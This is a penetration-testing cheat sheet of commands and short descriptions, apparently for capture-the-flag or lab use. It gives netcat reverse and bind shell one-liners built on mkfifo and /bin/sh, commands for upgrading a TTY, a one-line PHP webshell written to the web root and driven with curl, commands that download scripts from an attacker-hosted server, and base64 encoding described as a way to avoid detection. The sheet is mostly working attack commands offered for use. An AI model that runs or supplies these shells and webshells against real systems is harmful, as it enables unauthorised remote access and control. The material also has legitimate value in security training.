nc -lvnp 4444 |
Start an nc listener on a local port, in verbose mode with DNS resolution disabled |
nc <IP> 4444 |
Connect to a bind shell started on the remote server |
| Reverse shell cheat sheet |
|
| Bind shell cheat sheet |
|
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc <IP> 4444 >/tmp/f (reverse)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 |nc -lvp 4444 >/tmp/f (bind) |
Forward Shells |
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows X columns Y |
TTY upgrading |
python -c 'import pty; pty.spawn("/bin/bash")' |
TTY upgrading (python) |
echo "<?php system($_GET['cmd']);?>" > /var/www/html/shell.php |
Create a webshell php file |
curl http://<IP>/shell.php?cmd=id |
Execute a command on an uploaded webshell |
| Transferring Files |
|
python3 -m http.server 4444 |
Start a local webserver |
wget http://<IP>:4444/linenum.sh |
Download a file on the remote server from our local machine |
curl http://<IP>:4444/linenum.sh -o linenum.sh |
Download a file on the remote server from our local machine (using curl instead of wget) |
scp linenum.sh user@<IP>:/tmp/linenum.sh |
Transfer a file to the remote server with scp (requires SSH access with password) |
base64 linenum.sh -w 0 |
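Convert a file to a single-line base64 string (-w 0 disables line wrapping), useful to avoid detection; note that base64 is only an encoding, so any inspection that decodes it still sees the original content |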
echo f0VMR...SNIO...InmDwU | base64 -d > linenum.sh |
Convert a file from base64 back to its original form |
md5sum shell |
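Check the file's md5sum and compare it with the md5sum of the original file to ensure it converted correctly (MD5 only catches accidental corruption; it does not prove the file was not tampered with) |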